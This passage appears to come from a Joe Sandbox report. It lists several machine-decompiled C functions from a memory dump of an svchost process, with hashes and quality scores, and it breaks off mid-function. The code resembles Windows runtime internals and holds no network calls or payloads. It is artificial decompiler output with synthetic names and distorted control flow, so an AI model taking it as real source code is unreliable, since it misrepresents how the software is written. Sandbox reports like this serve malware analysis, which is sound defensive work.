                                          • Instruction ID: 509a3ff3a25fb3f11b08ffac1b66bf0d1725b6716766a0132d796a8956d7528b
                                          • Opcode Fuzzy Hash: 85ba6b0c6d8c529377426b356d2c2526c05ab727807a2bc9d4aa6bcd316c2ee9
                                          • Instruction Fuzzy Hash: AF31E0B1720204EFC712EB08EAA2F1BBBF9FB85704F440A9AE414C7644DB749900CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E03A2AA16(signed short* __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				signed short _v16;
                                          				intOrPtr _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				void* _v32;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t25;
                                          				signed short _t38;
                                          				signed short* _t42;
                                          				signed int _t44;
                                          				signed short* _t52;
                                          				signed short _t53;
                                          				signed int _t54;
                                          
                                          				_v8 =  *0x3b1d360 ^ _t54;
                                          				_t42 = __ecx;
                                          				_t44 =  *__ecx & 0x0000ffff;
                                          				_t52 =  &(__ecx[2]);
                                          				_t51 = _t44 + 2;
                                          				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                          					L4:
                                          					_t25 =  *0x3b17b9c; // 0x0
                                          					_t53 = L03A44620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                          					__eflags = _t53;
                                          					if(_t53 == 0) {
                                          						L3:
                                          						return E03A6B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                          					} else {
                                          						E03A6F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                          						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                          						L2:
                                          						_t51 = 4;
                                          						if(L03A36C59(_t53, _t51, _t58) != 0) {
                                          							_t28 = E03A55E50(0x3a0c338, 0, 0,  &_v32);
                                          							__eflags = _t28;
                                          							if(_t28 == 0) {
                                          								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                          								__eflags = _t38;
                                          								_v24 = _t53;
                                          								_v16 = _t38;
                                          								_v20 = 0;
                                          								_v12 = 0;
                                          								E03A5B230(_v32, _v28, 0x3a0c2d8, 1,  &_v24);
                                          								_t28 = E03A2F7A0(_v32, _v28);
                                          							}
                                          							__eflags = _t53 -  *_t52;
                                          							if(_t53 !=  *_t52) {
                                          								_t28 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						goto L3;
                                          					}
                                          				}
                                          				_t53 =  *_t52;
                                          				_t44 = _t44 >> 1;
                                          				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                          				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 124717af73857f81ec64b9a68cc9c52bf386e0b4156268ef4e9bb6b2b0664fb2
                                          • Instruction ID: 3cbbf3287a83f9d0583950c9b073e1a2c2017707c59b1bcf5cefea60653f7df4
                                          • Opcode Fuzzy Hash: 124717af73857f81ec64b9a68cc9c52bf386e0b4156268ef4e9bb6b2b0664fb2
                                          • Instruction Fuzzy Hash: E931E571A00229ABCF14EF69CE81A7FB7B8FF48700B05406BF911DB250EB349910C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E03A561A0(signed int* __ecx) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t49;
                                          				signed int _t51;
                                          				intOrPtr _t52;
                                          				signed int _t54;
                                          				void* _t59;
                                          				signed int* _t61;
                                          				intOrPtr* _t64;
                                          
                                          				_t61 = __ecx;
                                          				_v12 = 0;
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                          				_v16 = __ecx;
                                          				_v8 = 0;
                                          				if(_t30 == 0) {
                                          					L6:
                                          					_t31 = 0;
                                          					L7:
                                          					return _t31;
                                          				}
                                          				_t32 = _t30 + 0x5d8;
                                          				if(_t32 == 0) {
                                          					goto L6;
                                          				}
                                          				_t59 = _t32 + 0x30;
                                          				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                          					goto L6;
                                          				}
                                          				if(__ecx != 0) {
                                          					 *((intOrPtr*)(__ecx)) = 0;
                                          					 *((intOrPtr*)(__ecx + 4)) = 0;
                                          				}
                                          				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                          					_t51 =  *(_t32 + 0x10);
                                          					_t33 = _t32 + 0x10;
                                          					_v20 = _t33;
                                          					_t54 =  *(_t33 + 4);
                                          					if((_t51 | _t54) == 0) {
                                          						_t37 = E03A55E50(0x3a067cc, 0, 0,  &_v12);
                                          						if(_t37 != 0) {
                                          							goto L6;
                                          						}
                                          						_t52 = _v8;
                                          						asm("lock cmpxchg8b [esi]");
                                          						_t64 = _v16;
                                          						_t49 = _t37;
                                          						_v20 = 0;
                                          						if(_t37 == 0) {
                                          							if(_t64 != 0) {
                                          								 *_t64 = _v12;
                                          								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                          							}
                                          							E03AF9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                          							_t31 = 1;
                                          							goto L7;
                                          						}
                                          						E03A2F7C0(_t52, _v12, _t52, 0);
                                          						if(_t64 != 0) {
                                          							 *_t64 = _t49;
                                          							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                          						}
                                          						L12:
                                          						_t31 = 1;
                                          						goto L7;
                                          					}
                                          					if(_t61 != 0) {
                                          						 *_t61 = _t51;
                                          						_t61[1] = _t54;
                                          					}
                                          					goto L12;
                                          				} else {
                                          					goto L6;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d290063c0e2d2d4654c72837b6b49ff088e6d8cf8c0d49938206cc7bfadd4b31
                                          • Instruction ID: 892cd8057c1cbba9e360357bb023e4e0881b4fe1f3927d9eb780256645820864
                                          • Opcode Fuzzy Hash: d290063c0e2d2d4654c72837b6b49ff088e6d8cf8c0d49938206cc7bfadd4b31
                                          • Instruction Fuzzy Hash: 1C3169716153018FE720CF09C900B2AF7E4FB88B00F48496FB998AB361E775E804CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E03A64A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int* _v12;
                                          				char _v13;
                                          				signed int _v16;
                                          				char _v21;
                                          				signed int* _v24;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t29;
                                          				signed int* _t32;
                                          				signed int* _t41;
                                          				signed int _t42;
                                          				void* _t43;
                                          				intOrPtr* _t51;
                                          				void* _t52;
                                          				signed int _t53;
                                          				signed int _t58;
                                          				void* _t59;
                                          				signed int _t60;
                                          				signed int _t62;
                                          
                                          				_t49 = __edx;
                                          				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                          				_t26 =  *0x3b1d360 ^ _t62;
                                          				_v8 =  *0x3b1d360 ^ _t62;
                                          				_t41 = __ecx;
                                          				_t51 = __edx;
                                          				_v12 = __ecx;
                                          				if(_a4 == 0) {
                                          					if(_a8 != 0) {
                                          						goto L1;
                                          					}
                                          					_v13 = 1;
                                          					E03A42280(_t26, 0x3b18608);
                                          					_t58 =  *_t41;
                                          					if(_t58 == 0) {
                                          						L11:
                                          						E03A3FFB0(_t41, _t51, 0x3b18608);
                                          						L2:
                                          						 *0x3b1b1e0(_a4, _a8);
                                          						_t42 =  *_t51();
                                          						if(_t42 == 0) {
                                          							_t29 = 0;
                                          							L5:
                                          							_pop(_t52);
                                          							_pop(_t59);
                                          							_pop(_t43);
                                          							return E03A6B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                          						}
                                          						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                          						if(_v21 != 0) {
                                          							_t53 = 0;
                                          							E03A42280(_t28, 0x3b18608);
                                          							_t32 = _v24;
                                          							if( *_t32 == _t58) {
                                          								 *_t32 = _t42;
                                          								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                          								if(_t58 != 0) {
                                          									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                          									asm("sbb edi, edi");
                                          									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                          								}
                                          							}
                                          							E03A3FFB0(_t42, _t53, 0x3b18608);
                                          							if(_t53 != 0) {
                                          								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						_t29 = _t42;
                                          						goto L5;
                                          					}
                                          					if( *((char*)(_t58 + 0x40)) != 0) {
                                          						L10:
                                          						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                          						E03A3FFB0(_t41, _t51, 0x3b18608);
                                          						_t29 = _t58;
                                          						goto L5;
                                          					}
                                          					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          						goto L11;
                                          					}
                                          					goto L10;
                                          				}
                                          				L1:
                                          				_v13 = 0;
                                          				_t58 = 0;
                                          				goto L2;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91fb878d8f692b2d1f87f607e122f9414c35a28c97192dbdc55fada393c578d0
                                          • Instruction ID: 6ae97572ad98d0e9bdb40b656fbe2c9e8b01ef72820b0465b8dbe52b6ab7b2d0
                                          • Opcode Fuzzy Hash: 91fb878d8f692b2d1f87f607e122f9414c35a28c97192dbdc55fada393c578d0
                                          • Instruction Fuzzy Hash: B031F136215754AFCB21DF15CE41B2AFBA8FBC9B14F48456FE8668B650C770D800CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E03A68EC7(void* __ecx, void* __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char* _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				signed int* _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				signed int* _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				char* _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				signed int* _v108;
                                          				char _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				intOrPtr _v152;
                                          				char _v156;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t67;
                                          				intOrPtr _t70;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t73;
                                          
                                          				_t69 = __edx;
                                          				_v8 =  *0x3b1d360 ^ _t73;
                                          				_t48 =  *[fs:0x30];
                                          				_t72 = __edx;
                                          				_t71 = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                          					_t48 = E03A54E70(0x3b186e4, 0x3a69490, 0, 0);
                                          					if( *0x3b153e8 > 5 && E03A68F33(0x3b153e8, 0, 0x2000) != 0) {
                                          						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                          						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                          						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                          						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                          						_v108 =  &_v84;
                                          						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                          						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                          						_v76 =  &_v156;
                                          						_t70 = 8;
                                          						_v60 =  &_v144;
                                          						_t67 = 4;
                                          						_v44 =  &_v148;
                                          						_v152 = 0;
                                          						_v160 = 0;
                                          						_v104 = 0;
                                          						_v100 = 2;
                                          						_v96 = 0;
                                          						_v88 = 0;
                                          						_v80 = 0;
                                          						_v72 = 0;
                                          						_v68 = _t70;
                                          						_v64 = 0;
                                          						_v56 = 0;
                                          						_v52 = 0x3b153e8;
                                          						_v48 = 0;
                                          						_v40 = 0;
                                          						_v36 = 0x3b153e8;
                                          						_v32 = 0;
                                          						_v28 =  &_v164;
                                          						_v24 = 0;
                                          						_v20 = _t70;
                                          						_v16 = 0;
                                          						_t69 = 0x3a0bc46;
                                          						_t48 = E03AA7B9C(0x3b153e8, 0x3a0bc46, _t67, 0x3b153e8, _t70,  &_v140);
                                          					}
                                          				}
                                          				return E03A6B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b830f66071d480ac443d57394ef681f64bbe57ce7d710293c4a3c1104aae54c0
                                          • Instruction ID: 97ac4a1f9d16d3d5d0d9a07ba5e52030d85addd84955e34e757a1a879d333beb
                                          • Opcode Fuzzy Hash: b830f66071d480ac443d57394ef681f64bbe57ce7d710293c4a3c1104aae54c0
                                          • Instruction Fuzzy Hash: 8A419FB5D003189EDB20CFAAD980AADFBF8FB48310F5041AFE509A7240E7755A84CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E03A5E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                          				intOrPtr* _v0;
                                          				signed char _v4;
                                          				signed int _v8;
                                          				void* __ecx;
                                          				void* __ebp;
                                          				void* _t37;
                                          				intOrPtr _t38;
                                          				signed int _t44;
                                          				signed char _t52;
                                          				void* _t54;
                                          				intOrPtr* _t56;
                                          				void* _t58;
                                          				char* _t59;
                                          				signed int _t62;
                                          
                                          				_t58 = __edx;
                                          				_push(0);
                                          				_push(4);
                                          				_push( &_v8);
                                          				_push(0x24);
                                          				_push(0xffffffff);
                                          				if(E03A69670() < 0) {
                                          					L03A7DF30(_t54, _t58, _t35);
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(_t54);
                                          					_t52 = _v4;
                                          					if(_t52 > 8) {
                                          						_t37 = 0xc0000078;
                                          					} else {
                                          						_t38 =  *0x3b17b9c; // 0x0
                                          						_t62 = _t52 & 0x000000ff;
                                          						_t59 = L03A44620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                          						if(_t59 == 0) {
                                          							_t37 = 0xc0000017;
                                          						} else {
                                          							_t56 = _v0;
                                          							 *(_t59 + 1) = _t52;
                                          							 *_t59 = 1;
                                          							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                          							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                          							_t44 = _t62 - 1;
                                          							if(_t44 <= 7) {
                                          								switch( *((intOrPtr*)(_t44 * 4 +  &M03A5E810))) {
                                          									case 0:
                                          										L6:
                                          										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                          										goto L7;
                                          									case 1:
                                          										L13:
                                          										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                          										goto L6;
                                          									case 2:
                                          										L12:
                                          										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                          										goto L13;
                                          									case 3:
                                          										L11:
                                          										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                          										goto L12;
                                          									case 4:
                                          										L10:
                                          										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                          										goto L11;
                                          									case 5:
                                          										L9:
                                          										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                          										goto L10;
                                          									case 6:
                                          										L17:
                                          										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                          										goto L9;
                                          									case 7:
                                          										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                          										goto L17;
                                          								}
                                          							}
                                          							L7:
                                          							 *_a40 = _t59;
                                          							_t37 = 0;
                                          						}
                                          					}
                                          					return _t37;
                                          				} else {
                                          					_push(0x20);
                                          					asm("ror eax, cl");
                                          					return _a4 ^ _v8;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee094f17e2c4e91dd7883b56ed6841abbbd3e1040ea6f075baae0b96f542fad0
                                          • Instruction ID: 11a536f1712ce0d5fe8da72861cc51f43834a87ce06e9c06855ca08e0b370551
                                          • Opcode Fuzzy Hash: ee094f17e2c4e91dd7883b56ed6841abbbd3e1040ea6f075baae0b96f542fad0
                                          • Instruction Fuzzy Hash: CA316B75A14249AFD744DF68D941F9ABBE8FB09314F14826AF908CB341D635E980CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E03A5BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t22;
                                          				intOrPtr* _t41;
                                          				intOrPtr _t51;
                                          
                                          				_t51 =  *0x3b16100; // 0x5
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				if(_t51 >= 0x800) {
                                          					L12:
                                          					return 0;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					_t22 = _t51;
                                          					asm("lock cmpxchg [ecx], edx");
                                          					if(_t51 == _t22) {
                                          						break;
                                          					}
                                          					_t51 = _t22;
                                          					if(_t22 < 0x800) {
                                          						continue;
                                          					}
                                          					goto L12;
                                          				}
                                          				E03A42280(0xd, 0x1276f1a0);
                                          				_t41 =  *0x3b160f8; // 0x0
                                          				if(_t41 != 0) {
                                          					 *0x3b160f8 =  *_t41;
                                          					 *0x3b160fc =  *0x3b160fc + 0xffff;
                                          				}
                                          				E03A3FFB0(_t41, 0x800, 0x1276f1a0);
                                          				if(_t41 != 0) {
                                          					L6:
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                          					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                          					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                          					do {
                                          						asm("lock xadd [0x3b160f0], ax");
                                          						 *((short*)(_t41 + 0x34)) = 1;
                                          					} while (1 == 0);
                                          					goto L8;
                                          				} else {
                                          					_t41 = L03A44620(0x3b16100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                          					if(_t41 == 0) {
                                          						L11:
                                          						asm("lock dec dword [0x3b16100]");
                                          						L8:
                                          						return _t41;
                                          					}
                                          					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                          					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                          					if(_t41 == 0) {
                                          						goto L11;
                                          					}
                                          					goto L6;
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d313669a3c38b7d97ccb2d66728aff6c695045d8d3b977688df632025e403f86
                                          • Instruction ID: 5f1381775c503030c7ee4faaf6e5a6b90a43824662c19e24ba9c932da9ff5502
                                          • Opcode Fuzzy Hash: d313669a3c38b7d97ccb2d66728aff6c695045d8d3b977688df632025e403f86
                                          • Instruction Fuzzy Hash: EA31EE36A006199FCB51EF58D4C0BA6B3B4FB18316F4501BAFD44DB245EB74DA05CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E03A29100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                          				signed int _t53;
                                          				signed int _t56;
                                          				signed int* _t60;
                                          				signed int _t63;
                                          				signed int _t66;
                                          				signed int _t69;
                                          				void* _t70;
                                          				intOrPtr* _t72;
                                          				void* _t78;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t82;
                                          				void* _t85;
                                          				void* _t88;
                                          				void* _t89;
                                          
                                          				_t84 = __esi;
                                          				_t70 = __ecx;
                                          				_t68 = __ebx;
                                          				_push(0x2c);
                                          				_push(0x3aff6e8);
                                          				E03A7D0E8(__ebx, __edi, __esi);
                                          				 *((char*)(_t85 - 0x1d)) = 0;
                                          				_t82 =  *((intOrPtr*)(_t85 + 8));
                                          				if(_t82 == 0) {
                                          					L4:
                                          					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                          						E03AF88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                          					}
                                          					L5:
                                          					return E03A7D130(_t68, _t82, _t84);
                                          				}
                                          				_t88 = _t82 -  *0x3b186c0; // 0x3401228
                                          				if(_t88 == 0) {
                                          					goto L4;
                                          				}
                                          				_t89 = _t82 -  *0x3b186b8; // 0x0
                                          				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					goto L4;
                                          				} else {
                                          					E03A42280(_t82 + 0xe0, _t82 + 0xe0);
                                          					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                          					__eflags =  *((char*)(_t82 + 0xe5));
                                          					if(__eflags != 0) {
                                          						E03AF88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                          						goto L12;
                                          					} else {
                                          						__eflags =  *((char*)(_t82 + 0xe4));
                                          						if( *((char*)(_t82 + 0xe4)) == 0) {
                                          							 *((char*)(_t82 + 0xe4)) = 1;
                                          							_push(_t82);
                                          							_push( *((intOrPtr*)(_t82 + 0x24)));
                                          							E03A6AFD0();
                                          						}
                                          						while(1) {
                                          							_t60 = _t82 + 8;
                                          							 *(_t85 - 0x2c) = _t60;
                                          							_t68 =  *_t60;
                                          							_t80 = _t60[1];
                                          							 *(_t85 - 0x28) = _t68;
                                          							 *(_t85 - 0x24) = _t80;
                                          							while(1) {
                                          								L10:
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t84 = _t68;
                                          								 *(_t85 - 0x30) = _t80;
                                          								 *(_t85 - 0x24) = _t80 - 1;
                                          								asm("lock cmpxchg8b [edi]");
                                          								_t68 = _t84;
                                          								 *(_t85 - 0x28) = _t68;
                                          								 *(_t85 - 0x24) = _t80;
                                          								__eflags = _t68 - _t84;
                                          								_t82 =  *((intOrPtr*)(_t85 + 8));
                                          								if(_t68 != _t84) {
                                          									continue;
                                          								}
                                          								__eflags = _t80 -  *(_t85 - 0x30);
                                          								if(_t80 !=  *(_t85 - 0x30)) {
                                          									continue;
                                          								}
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t63 = 0;
                                          								 *(_t85 - 0x34) = 0;
                                          								_t84 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									 *(_t85 - 0x3c) = _t84;
                                          									__eflags = _t84 - 3;
                                          									if(_t84 >= 3) {
                                          										break;
                                          									}
                                          									__eflags = _t63;
                                          									if(_t63 != 0) {
                                          										L40:
                                          										_t84 =  *_t63;
                                          										__eflags = _t84;
                                          										if(_t84 != 0) {
                                          											_t84 =  *(_t84 + 4);
                                          											__eflags = _t84;
                                          											if(_t84 != 0) {
                                          												 *0x3b1b1e0(_t63, _t82);
                                          												 *_t84();
                                          											}
                                          										}
                                          										do {
                                          											_t60 = _t82 + 8;
                                          											 *(_t85 - 0x2c) = _t60;
                                          											_t68 =  *_t60;
                                          											_t80 = _t60[1];
                                          											 *(_t85 - 0x28) = _t68;
                                          											 *(_t85 - 0x24) = _t80;
                                          											goto L10;
                                          										} while (_t63 == 0);
                                          										goto L40;
                                          									}
                                          									_t69 = 0;
                                          									__eflags = 0;
                                          									while(1) {
                                          										 *(_t85 - 0x38) = _t69;
                                          										__eflags = _t69 -  *0x3b184c0;
                                          										if(_t69 >=  *0x3b184c0) {
                                          											break;
                                          										}
                                          										__eflags = _t63;
                                          										if(_t63 != 0) {
                                          											break;
                                          										}
                                          										_t66 = E03AF9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                          										__eflags = _t66;
                                          										if(_t66 == 0) {
                                          											_t63 = 0;
                                          											__eflags = 0;
                                          										} else {
                                          											_t63 = _t66 + 0xfffffff4;
                                          										}
                                          										 *(_t85 - 0x34) = _t63;
                                          										_t69 = _t69 + 1;
                                          									}
                                          									_t84 = _t84 + 1;
                                          								}
                                          								__eflags = _t63;
                                          							}
                                          							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                          							 *((char*)(_t82 + 0xe5)) = 1;
                                          							 *((char*)(_t85 - 0x1d)) = 1;
                                          							L12:
                                          							 *(_t85 - 4) = 0xfffffffe;
                                          							E03A2922A(_t82);
                                          							_t53 = E03A47D50();
                                          							__eflags = _t53;
                                          							if(_t53 != 0) {
                                          								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          							} else {
                                          								_t56 = 0x7ffe0386;
                                          							}
                                          							__eflags =  *_t56;
                                          							if( *_t56 != 0) {
                                          								_t56 = E03AF8B58(_t82);
                                          							}
                                          							__eflags =  *((char*)(_t85 - 0x1d));
                                          							if( *((char*)(_t85 - 0x1d)) != 0) {
                                          								__eflags = _t82 -  *0x3b186c0; // 0x3401228
                                          								if(__eflags != 0) {
                                          									__eflags = _t82 -  *0x3b186b8; // 0x0
                                          									if(__eflags == 0) {
                                          										_t79 = 0x3b186bc;
                                          										_t72 = 0x3b186b8;
                                          										goto L18;
                                          									}
                                          									__eflags = _t56 | 0xffffffff;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										E03A29240(_t68, _t82, _t82, _t84, __eflags);
                                          									}
                                          								} else {
                                          									_t79 = 0x3b186c4;
                                          									_t72 = 0x3b186c0;
                                          									L18:
                                          									E03A59B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                          								}
                                          							}
                                          							goto L5;
                                          						}
                                          					}
                                          				}
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c67721e3f114e2308c79873257a9d79bf45ec4d5e81b05cad640569e404c75d5
                                          • Instruction ID: fb6f4d6b66abd0cba2694cee048b35ac2586b1057994cc723798f03d4ec67e69
                                          • Opcode Fuzzy Hash: c67721e3f114e2308c79873257a9d79bf45ec4d5e81b05cad640569e404c75d5
                                          • Instruction Fuzzy Hash: 5731CE79A00294DFDB65EBADC588BAEBBB5BB49B14F18818FD4046B340C334A990CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E03A51DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr* _v20;
